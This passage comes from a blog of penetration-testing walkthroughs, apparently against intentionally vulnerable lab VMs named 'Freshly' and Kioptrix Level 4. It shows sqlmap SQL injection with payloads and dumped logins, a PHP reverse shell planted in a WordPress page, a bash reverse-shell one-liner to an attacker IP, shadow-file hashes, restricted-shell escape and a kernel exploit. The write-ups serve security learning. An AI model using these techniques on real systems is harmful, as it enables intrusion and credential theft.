[23:50:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.1.1.11'

[*] shutting down at 23:50:03

root@kali:~#

________________________________________________________________________________

Lets use the new found credentials:


Bingo:



Now, I have used multiple ways to get a shell while hacking wordpress, often times uploading a plugin which allows to modification of file types when .php extensions are blocked. Yes that was the case here as well. (Also, the Cart66 SQL Injection exploit may work now as well). However a good friend brought the obvious thing to my attention; "Why go through the trouble of uploading a plugin potentially leaving tracks when you can just update an existing page within wordpress with your own php code?". I had no logical answer. So I did it, and it was much easier.  

Those of you who are familiar with Kali, there are webshells for most of your needs in the following directory:

/usr/share/webshells/php


Penetration


The php-reverse-shell.php is identical to the one hosted by pentestmonkey. I was able to simply cut and paste the contents of the file into the 404.page in wordpress. 

There is one aspect of the shell which needs to be modified to match your attacking machine address:

$ip = '10.1.1.5';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

After starting a netcat listner on port 1234 and browsing to the now malicious 404.php page, the reverseshell is executed:


Now that we have a limited shell, we'll need to escape from it. Whenever possible, I use the follwing python shell escape sequence:

python -c 'import pty; pty.spawn("/bin/bash")'

Here are a couple of other valuable shell escape sequences, python won't always be at your disposal:

bash -i >& /dev/tcp/192.168.22.10/443 0>&1
/bin/sh -i

and... creating and copying a public keyfile to the .authorized_keys directory on the victim; more to come on this in a separate write-up.

Once I had a decent shell, things moved pretty quickly due to permissions on the etc/shadow file:


$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@Freshly:/$

daemon@Freshly:/$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@Freshly:/$

daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
daemon@Freshly:/$ 


___________________________________________________________________


This was probably enough to satisfy the requirements of the Challenge, but I continued. 

I ran John against the password hashes using my favorite wordlist:


I probably didn't have to but I login as the cracked user "candycane"

Running an enumeration script, I found that the login.php file had database credentials hard coded in it:

candycane@Freshly:/var/www/html$ cat login.php
cat login.php
mysql_connect('localhost','root','SuperSecretPassword');
mysql_select_db('login');
?>

Same password as wordpress, nobody does that, yeah right...

So I logged in as the DB root user with these credentials and enumerated a bit more:


candycane@Freshly:/var/www/html$ mysql --user=root --password=SuperSecretPassword wordpress8080
d wordpress8080ot --password=SuperSecretPasswor
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4886
Server version: 5.5.41-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>


mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| login              |
| mysql              |
| performance_schema |
| phpmyadmin         |
| users              |
| wordpress8080      |
+--------------------+
7 rows in set (0.00 sec)

mysql> show tables from login;
show tables from login;
+-----------------+
| Tables_in_login |
+-----------------+
| user_name       |
| users           |
+-----------------+
2 rows in set (0.00 sec)

mysql> use login;
use login;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from users;
select * from users;
+-----------+----------+
| user_name | password |
+-----------+----------+
| candyshop | password |
| Sir       | PopRocks |
+-----------+----------+
2 rows in set (0.00 sec)

mysql>

______________________________________________________________________________


So this yielded a little more information. I chose not to continue enumerating and decided to try to use the same reused password for the root account and bingo!

I pwned the box:


Overall, I enjoyed this VM challenge do to its realism. Some challenges are fun and thought provoking, but I enjoy the ones that mimic real-world systems and human mistakes. Thanks to the guys at Top-Hat-Sec.

Court Graham, CISSP, OSCP, CEH, PCI-QSA, ITIL 


Friday, May 22, 2015

Kioptrix Level 4 Walkthough


This is the first in a long series of Vulnerable Virtual Machine Walkthroughs that I'll be posting to this site.By looking at the date of my last post, one would assume that I've gone dormant, but that's definitely not the case. So with out further a due, I bring you Kioptrix Level 4.

Enumeration

root@kali:~# nmap 10.1.1.10
Starting Nmap 6.47 ( http://nmap.org ) at 2015-05-21 09:05 EDT
Nmap scan report for 10.1.1.10
Host is up (0.00032s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:C2:50:41 (Cadmus Computer Systems)


Nmap done: 19 IP addresses (3 hosts up) scanned in 9.10 seconds
root@kali:~#


Visiting the webpage on port 80 revealed a login page which may be vulnerable to some sql injection:

Using a bunch of the usual combinations, I was able to provoke the site into revealing the underlying dbms (MYSQL)
With this information I was able to specify the dmbs within my use of sqlmap Sqlmap output

root@kali:~# sqlmap -u "http://10.1.1.10/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:14:03

[09:14:03] [INFO] testing connection to the target URL
[09:14:04] [INFO] heuristics detected web page charset 'ascii'
[09:14:04] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:14:05] [INFO] target URL is stable
[09:14:05] [INFO] testing if POST parameter 'myusername' is dynamic
[09:14:05] [WARNING] POST parameter 'myusername' does not appear dynamic
[09:14:05] [WARNING] heuristic (basic) test shows that POST parameter 'myusername' might not be injectable
[09:14:05] [INFO] testing for SQL injection on POST parameter 'myusername'
[09:14:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[09:14:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:14:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[09:14:09] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[09:14:10] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:14:10] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[09:14:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[09:14:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:14:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[09:14:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[09:14:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[09:14:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:14:12] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
Blah, blah,blah...................blah...........Ultimately revealing usernames and passwords with in the underlying database
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-4827' OR (7207=7207) AND 'wyxA'='wyxA

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=test' AND 8831=BENCHMARK(5000000,MD5(0x46556262)) AND 'KxNZ'='KxNZ
---
[09:16:14] [INFO] testing MySQL
[09:16:14] [INFO] confirming MySQL
[09:16:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[09:16:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:16:14] [INFO] fetching current database
[09:16:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:16:14] [INFO] retrieved: members
[09:16:15] [INFO] fetching tables for database: 'members'
[09:16:15] [INFO] fetching number of tables for database 'members'
[09:16:15] [INFO] retrieved: 1
[09:16:15] [INFO] retrieved: members
[09:16:15] [INFO] fetching columns for table 'members' in database 'members'
[09:16:15] [INFO] retrieved: 3
[09:16:15] [INFO] retrieved: id
[09:16:16] [INFO] retrieved: username
[09:16:16] [INFO] retrieved: password
[09:16:17] [INFO] fetching entries for table 'members' in database 'members'
[09:16:17] [INFO] fetching number of entries for table 'members' in database 'members'
[09:16:17] [INFO] retrieved: 2
[09:16:17] [INFO] retrieved: 1
[09:16:17] [INFO] retrieved: MyNameIsJohn
[09:16:18] [INFO] retrieved: john
[09:16:18] [INFO] retrieved: 2
[09:16:19] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[09:16:20] [INFO] retrieved: robert
[09:16:21] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

[09:16:21] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/10.1.1.10/dump/members/members.csv'
[09:16:21] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.1.1.10'

[*] shutting down at 09:16:21

root@kali:~#


Now lets attempt to ssh in with john's credentials

root@kali:~# ssh john@10.1.1.10
The authenticity of host '10.1.1.10 (10.1.1.10)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.10' (RSA) to the list of known hosts.
john@10.1.1.10's password:
Connection closed by 10.1.1.10
root@kali:~# ssh john@10.1.1.10
john@10.1.1.10's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls

Awesome, the credentials worked but now we're trapped in a stupid shell..... how do we escape?

Research on how to escape this shell lead me to the following webpage:

http://www.aldeid.com/wiki/Lshell

Worked like a charm!

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$


john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Now time to take a look around and escalate privilege , looks like this Linux Kernel is vulnerable to some of the old favorites.

john@Kioptrix4:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
john@Kioptrix4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
john@Kioptrix4:~$ pwd
/home/john
john@Kioptrix4:~$ ls
john@Kioptrix4:~$ cd ..
john@Kioptrix4:/home$ ls
john  loneferret  robert
john@Kioptrix4:/home$ cd loneferret
john@Kioptrix4:/home/loneferret$ ls
john@Kioptrix4:/home/loneferret$ ls -al
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root       root       4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret   62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret  220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret    1 2012-02-05 10:37 .lhistory
-rw------- 1 root       root         68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root       root          1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret    1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret    9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret  586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret    0 2012-02-04 10:01 .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .sudo_as_admin_successful
john@Kioptrix4:/home/loneferret$ more .bash_history
.bash_history: Permission denied

As you can see I came across lots of interesting things including mysql and nice stuff in user directories, but it was my old faithful Linux Sendpage exploit which brought home the bacon.


john@Kioptrix4:~$ ./sendpage
#